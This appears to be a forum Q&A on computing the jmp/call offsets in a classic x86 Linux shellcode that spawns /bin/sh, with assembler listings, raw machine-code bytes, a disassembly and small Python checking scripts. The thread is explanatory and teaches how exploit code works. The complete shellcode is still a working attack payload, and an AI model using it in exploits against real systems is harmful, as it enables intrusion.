To create the shellcode, the author replaces the offset placeholders with their calculated values, i.e. this:
jmp offset-to-call # 2 bytes
popl %esi # 1 byte
movl %esi,array-offset(%esi) # 3 bytes
movb $0x0,nullbyteoffset(%esi) # 4 bytes
movl $0x0,null-offset(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal array-offset(%esi),%ecx # 3 bytes
leal null-offset(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call offset-to-popl # 5 bytes
/bin/sh string goes here.
gets translated into this:
jmp 0x26 # 2 bytes
popl %esi # 1 byte
movl %esi,0x8(%esi) # 3 bytes
movb $0x0,0x7(%esi) # 4 bytes
movl $0x0,0xc(%esi) # 7 bytes
movl $0xb,%eax # 5 bytes
movl %esi,%ebx # 2 bytes
leal 0x8(%esi),%ecx # 3 bytes
leal 0xc(%esi),%edx # 3 bytes
int $0x80 # 2 bytes
movl $0x1, %eax # 5 bytes
movl $0x0, %ebx # 5 bytes
int $0x80 # 2 bytes
call -0x2b # 5 bytes
.string "/bin/sh" # 8 bytes
However, I calculated offset-to-call to be 0x2a or 42 bytes (1+3+4+7+5+2+3+3+2+5+5+2) and offset-to-popl to be -0x2a.
How does the author get 0x26 and -0x2b?
0x2a is correct, as can be verified by assembling. For the call it's obviously going to be 5 bytes more (as that is the length of the call instruction), so -0x2f is correct. Funnily enough, neither of you got that right ;) Note that these are the offsets in the machine code, not something you can feed into the assembler. For that you should simply use a label:
1 0000 EB2A jmp label_call # 2 bytes
2 label_popl:
3 0002 5E popl %esi # 1 byte
4 0003 897608 movl %esi,0x8(%esi) # 3 bytes
5 0006 C6460700 movb $0x0,0x7(%esi) # 4 bytes
6 000a C7460C00 movl $0x0,0xc(%esi) # 7 bytes
6 000000
7 0011 B80B0000 movl $0xb,%eax # 5 bytes
7 00
8 0016 89F3 movl %esi,%ebx # 2 bytes
9 0018 8D4E08 leal 0x8(%esi),%ecx # 3 bytes
10 001b 8D560C leal 0xc(%esi),%edx # 3 bytes
11 001e CD80 int $0x80 # 2 bytes
12 0020 B8010000 movl $0x1, %eax # 5 bytes
12 00
13 0025 BB000000 movl $0x0, %ebx # 5 bytes
13 00
14 002a CD80 int $0x80 # 2 bytes
15 label_call:
16 002c E8D1FFFF call label_popl # 5 bytes
16 FF
17 0031 2F62696E .string "/bin/sh" # 8 bytes
17 2F736800
Or use a . relative address, but that needs different offsets, as . refers to the current address and not the address of the next instruction as required by the machine code:
1 0000 EB2A jmp .+0x2c # 2 bytes
2 0002 5E popl %esi # 1 byte
3 0003 897608 movl %esi,0x8(%esi) # 3 bytes
4 0006 C6460700 movb $0x0,0x7(%esi) # 4 bytes
5 000a C7460C00 movl $0x0,0xc(%esi) # 7 bytes
5 000000
6 0011 B80B0000 movl $0xb,%eax # 5 bytes
6 00
7 0016 89F3 movl %esi,%ebx # 2 bytes
8 0018 8D4E08 leal 0x8(%esi),%ecx # 3 bytes
9 001b 8D560C leal 0xc(%esi),%edx # 3 bytes
10 001e CD80 int $0x80 # 2 bytes
11 0020 B8010000 movl $0x1, %eax # 5 bytes
11 00
12 0025 BB000000 movl $0x0, %ebx # 5 bytes
12 00
13 002a CD80 int $0x80 # 2 bytes
14 002c E8D1FFFF call .-0x2a # 5 bytes
14 FF
15 0031 2F62696E .string "/bin/sh" # 8 bytes
15 2F736800
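The difference between the two kinds of offsets can be checked with a little arithmetic. The following is only a sketch: the helper names are made up for illustration, and the addresses and instruction lengths are read off the listings above.

```python
# Hypothetical helpers; addresses and lengths come from the assembler listing.

def encoded_displacement(insn_addr, insn_len, target):
    """Displacement stored in the machine code: counted from the NEXT instruction."""
    return target - (insn_addr + insn_len)

def dot_offset(insn_addr, target):
    """Offset to write after '.' in the source: counted from the instruction itself."""
    return target - insn_addr

# jmp sits at 0x00, is 2 bytes long, and targets the call at 0x2c.
jmp_disp = encoded_displacement(0x00, 2, 0x2c)
jmp_dot = dot_offset(0x00, 0x2c)

# call sits at 0x2c, is 5 bytes long, and targets the popl at 0x02.
call_disp = encoded_displacement(0x2c, 5, 0x02)
call_dot = dot_offset(0x2c, 0x02)

print(hex(jmp_disp), hex(jmp_dot))    # machine code value vs. value after '.'
print(hex(call_disp), hex(call_dot))
```

The two values for each instruction differ by exactly the instruction length, which is why jmp .+0x2c assembles to EB 2A and call .-0x2a assembles to E8 D1 FF FF FF.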
The disassembly in both cases is:
0: eb 2a jmp 0x2c
2: 5e pop %esi
3: 89 76 08 mov %esi,0x8(%esi)
6: c6 46 07 00 movb $0x0,0x7(%esi)
a: c7 46 0c 00 00 00 00 movl $0x0,0xc(%esi)
11: b8 0b 00 00 00 mov $0xb,%eax
16: 89 f3 mov %esi,%ebx
18: 8d 4e 08 lea 0x8(%esi),%ecx
1b: 8d 56 0c lea 0xc(%esi),%edx
1e: cd 80 int $0x80
20: b8 01 00 00 00 mov $0x1,%eax
25: bb 00 00 00 00 mov $0x0,%ebx
2a: cd 80 int $0x80
2c: e8 d1 ff ff ff call 0x2
This confirms the correct target addresses.
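If no disassembler is at hand, the targets can also be recovered from the raw bytes by hand. Here is a rough sketch that assumes only the two encodings used in this code (EB with an 8-bit displacement, E8 with a 32-bit little-endian displacement); the function names are invented for this example.

```python
import struct

def jmp_short_target(addr, raw):
    """Decode 'EB rel8': target = address of next instruction + signed 8-bit displacement."""
    assert raw[0] == 0xEB and len(raw) == 2
    (rel,) = struct.unpack("<b", raw[1:2])
    return addr + len(raw) + rel

def call_near_target(addr, raw):
    """Decode 'E8 rel32': target = address of next instruction + signed 32-bit displacement."""
    assert raw[0] == 0xE8 and len(raw) == 5
    (rel,) = struct.unpack("<i", raw[1:5])
    return addr + len(raw) + rel

# Bytes and addresses taken from the disassembly.
jmp_target = jmp_short_target(0x00, bytes.fromhex("eb2a"))
call_target = call_near_target(0x2c, bytes.fromhex("e8d1ffffff"))

print(hex(jmp_target), hex(call_target))
```

Both results should match the addresses the disassembler prints next to jmp and call.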
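PS: having zero bytes in shellcode is usually not a good idea, since shellcode is often delivered through string functions such as strcpy, which stop copying at the first zero byte.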
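To see how many zero bytes this particular code contains, the bytes from the disassembly can be scanned with a short script. This is just an illustrative sketch; the variable names are arbitrary and the trailing "/bin/sh" string is left out.

```python
# Machine code bytes copied from the disassembly, one instruction per line.
SHELLCODE = bytes.fromhex(
    "eb2a"            # jmp
    "5e"              # pop  %esi
    "897608"          # mov  %esi,0x8(%esi)
    "c6460700"        # movb $0x0,0x7(%esi)
    "c7460c00000000"  # movl $0x0,0xc(%esi)
    "b80b000000"      # mov  $0xb,%eax
    "89f3"            # mov  %esi,%ebx
    "8d4e08"          # lea  0x8(%esi),%ecx
    "8d560c"          # lea  0xc(%esi),%edx
    "cd80"            # int  $0x80
    "b801000000"      # mov  $0x1,%eax
    "bb00000000"      # mov  $0x0,%ebx
    "cd80"            # int  $0x80
    "e8d1ffffff"      # call
)

# Collect the offsets of all zero bytes.
zero_offsets = [i for i, b in enumerate(SHELLCODE) if b == 0]

print(len(SHELLCODE), "bytes,", len(zero_offsets), "of them zero")
print("first zero byte at offset", hex(zero_offsets[0]))
```

The zero bytes all come from the immediate operands of the mov instructions, so those are the instructions that would need to be rewritten.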